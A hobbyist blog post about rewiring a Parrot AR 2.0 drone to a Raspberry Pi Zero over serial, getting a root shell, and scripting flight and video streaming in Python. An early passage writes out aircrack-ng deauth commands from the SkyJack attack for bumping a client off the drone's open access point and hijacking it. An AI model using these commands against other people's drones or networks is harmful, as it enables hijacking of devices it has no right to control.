SmellsLikeML

AR-2.0 Drone Hacks

1/10/18

AR 2.0, UART, TX/RX, Serial, Hack

After working to push the limits of the Raspberry Pi Zero in a hackster.io contest, we wanted to trade the dog biometric sensors for the telemetry and navigation sensors of the Parrot AR 2.0 drone.

The factory hardware is extremely limited, and we would like the computer-vision-enabled Pi Zero to access the video stream and issue commands.

Out of the factory, the AR 2.0 drone is configured as a wifi access point with an SSID starting with 'ardrone2_'. This network configuration is susceptible to the SkyJack attack, whereby an attacker issues deauth packets to clients connected to the AP, typically using a second USB wifi adapter in monitor mode. This bumps the client device off 192.168.1.2, making way for the attacker to connect over the only IP the AR takes commands from, effectively hijacking the drone.
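
For context, the deauth step looks roughly like this with the aircrack-ng suite; the interface name, monitor-mode naming, and MAC addresses below are placeholders and will differ on your setup.

airmon-ng start wlan1                 # put the USB wifi adapter into monitor mode
aireplay-ng --deauth 10 -a <drone_AP_MAC> -c <client_MAC> wlan1mon
# with 192.168.1.2 freed up, associate with the drone's open AP and claim that address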

Unlike dogs, the drone has a serial port. This makes wiring the pi zero directly to the embedded hardware attractive, and it should be a faster, more fault-tolerant means of streaming video for processing and controlling the drone. Begin by disconnecting the jumper cables from the GPIO header; we're not going to need a heart rate monitor.

Here, we establish a connection via a USB-to-TTL serial converter. Of course, for this investigation, you can simply plug the USB end directly into your computer rather than ssh'ing through the Pi Zero.

The 6-pin serial port is most easily accessible by peeling back the plastic plate under the body of the drone.

Here we see the wiring more closely. Pictured: the orange wire is ground, the white wire runs from TX to RX, and the yellow runs from RX to TX. Make sure not to wire RX to RX!

After making this physical connection, issue the command screen /dev/ttyUSB0 115200 from the pi zero command line (baud rate: 115200). Then, reboot the drone to get dropped into a shell with root privileges. One might consider reconfiguring the network SSID to misdirect a would-be attacker.


screen /dev/ttyUSB0 115200

We could have simply telnetted into the same shell after connecting to the wifi network, but the point is we used the serial port. This means we can work with the drone even if wifi connectivity becomes impossible. More importantly to us, this provides a physical connection between the drone and the pi zero.
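
For reference, that wifi route is a one-liner, since the stock firmware runs an open telnet daemon on the drone's address:

telnet 192.168.1.1   # over wifi: the same BusyBox root shell, no password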

In this shell, you see the AR Drone runs BusyBox on an embedded Linux system. Now, open a new tab and run screen -d to detach the session and identify its id, then run screen -X -S session_id quit. This kills the session, freeing /dev/ttyUSB0 so you can redirect the information printed on reboot into a file with: cat /dev/ttyUSB0 >> AR_bootup_info.txt


screen -d                        # from a new tab: detach the remote session (prints its id)
screen -X -S session_id quit     # kill that session, freeing /dev/ttyUSB0
echo 'reboot' > /dev/ttyUSB0     # send the 'reboot' command to the drone over serial
cat /dev/ttyUSB0 >> AR_bootup_info.txt  # capture the boot messages to a file

Inspecting this file after rebooting, we find the ATCmdServer starting up at boot. Grepping the file system with grep -nr ATCmdServer, you'll identify the program.elf file. This is the main program and its source code is not openly available.
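
Something like the following from the drone's root shell; the search root and the stderr redirect are our additions to keep the output readable.

grep -nr ATCmdServer / 2>/dev/null    # flags /bin/program.elf as a (binary) match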

Security experts offer a detailed review of their investigations into the platform. They point out that program.elf prevents any other process from accessing the two onboard cameras, and they detail overwriting shared library code to introduce a hook for the device handles, blocking reads/writes so they can copy buffered images into a folder under /tmp (which lives in RAM) for processing. But our pi zero already has a camera. We want to stream from the drone's cameras as well, and to access the magnetometer, ultrasound, accelerometer, and altimeter data while issuing controls conditioned on programming logic executed on the zero.

I considered what information I might be able to extract from program.elf. To do this, I needed to get the file onto another computer, so I plugged a USB drive into the drone after shutting it down. Then, from the screen session on /dev/ttyUSB0, after bootup, copy /bin/program.elf to /data/video/USB0/, power down the drone, unplug the USB drive, and copy the file over to your computer.


echo 'cp /bin/program.elf /data/video/USB0/' > /dev/ttyUSB0

From here, I hoped to reverse engineer program.elf. However, we ran into a wall in attempts to gain information using objdump and gdb. Running readelf -h program.elf offered more information.
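
Roughly the sequence tried against the copied binary; the exact flags here are our guess.

objdump -d program.elf    # disassembly attempt
gdb program.elf           # poke around for symbols
readelf -h program.elf    # ELF header: class, target machine, entry point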

It seems that, for now, the best way to control the AR 2.0 is through its network ports, UDP 5554 (navdata) and 5556 (AT commands) and TCP 5555 (video), sending Hayes-style AT commands via sockets as done in this repo. Otherwise, you may undertake building a replacement for program.elf after mapping out the sensors and servos.
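
As a minimal sketch of that route (our own example, not code from the linked repo): AT commands are plain strings terminated by a carriage return, sent over UDP to port 5556 with an increasing sequence number, and AT*REF with the right bits set triggers takeoff or landing. The constants below are the commonly cited values from the developer guide, so verify them before flying.

import socket
from time import sleep

DRONE_IP, AT_PORT = '192.168.1.1', 5556   # AT command port (UDP)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

def at_ref(seq, value):
    # AT*REF carries the takeoff/land/emergency bits; seq must increase on each call
    sock.sendto('AT*REF={},{}\r'.format(seq, value).encode('ascii'),
                (DRONE_IP, AT_PORT))

at_ref(1, 290718208)   # base value with the takeoff bit set
sleep(5)
at_ref(2, 290717696)   # back to the base value: land

The same socket pattern extends to AT*PCMD for movement, while navdata comes back on UDP 5554 and video on TCP 5555.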

Chapter 3 of the AR Drone 2.0 developer SDK makes it clear that direct hardware access is not supported.

Part II: Repurpose the USB-to-TTL adapter

Since program.elf wants data moving over the network, we can ignore the serial port for data. Although the serial port provides power, we have the USB-to-TTL adapter around, so instead we can hack it to pull 5V from the USB port on the top of the AR Drone near the battery compartment, then route wires through the drone body to the Pi Zero's pins 2 and 6 (5V and GND).

This is more convenient than drawing power through the serial port, since space between the board and the panel beneath is limited. The adapter also helps to regulate power to the pi zero; wiring directly from the serial header to the pins would likely cause problems. Further, since we can access data over the network, we can stream to the pi zero's file system instead of mounting a USB drive.

Here you can see that I've used a pi zero without the GPIO headers soldered on. This provides a little more clearance to squeeze the computer into the space shared with the AR's embedded hardware.

I've also swapped the infrared cameras of poochpak for the humble picam to reduce power consumption. A dab of hot glue fixes the cam case to the back of the drone, offering another viewpoint directly accessible to the pi zero.

From here, I tucked cables into the drone's internal compartments and connected the pi0 to the ar-drone network. You can do this with peripherals attached, or ssh in over your personal network and edit /etc/wpa_supplicant/wpa_supplicant.conf to point it at the drone's SSID.
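
The relevant block is short; the drone's AP is open, so no passphrase is needed (the SSID suffix below is a placeholder for your drone's).

# appended to /etc/wpa_supplicant/wpa_supplicant.conf on the pi zero
network={
    ssid="ardrone2_XXXXXX"
    key_mgmt=NONE
}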

For the first test flight, I used these modules. Since we have OpenCV from the last project, I can stream the video to the pi zero using cv2.VideoCapture('tcp://192.168.1.1:5555'). I wrote a short script to take off, hover, stream video and navigation data, then land and disconnect.


import cv2                  # OpenCV, already on the pi zero from the last project
from time import sleep
import ardrone              # AR Drone client module providing the ARDrone class

MAX_FLIGHT_TIME = 60        # caps loop iterations (frames read), not seconds

# open the drone's front camera stream over TCP before taking off
cam = cv2.VideoCapture('tcp://192.168.1.1:5555')
print('Video Stream Connected')

drone = ardrone.ARDrone()
drone.reset()               # clear any emergency state
print('Initialized Drone')
sleep(5)

drone.takeoff()
print('Drone Taking Off')
sleep(5)                    # give it time to reach a stable hover

running = True
i = 0
while running and i < MAX_FLIGHT_TIME:
    i += 1
    running, frame = cam.read()   # grab a frame; running goes False if the stream drops
    print(frame)                  # dump the raw frame array
    print(drone.navdata)          # dump telemetry (attitude, altitude, battery, ...)

drone.land()
drone.halt()                # stop communication with the drone
cam.release()

I made the script executable, set a crontab entry to kick it off at a specific time, and waited. The drone took off, hovered, began to turn, and then climbed until it wedged into a corner at the ceiling of my apartment. A valuable lesson here: I could have lost the drone to the wind if I hadn't been inside. You'll want to test in a space where the drone can't get away, and it's worth noting the inherent danger in setting an out-of-control drone loose. I need to introduce a kill switch, but we are on the verge of programmed flight for a drone we've already enabled with object recognition using YOLO.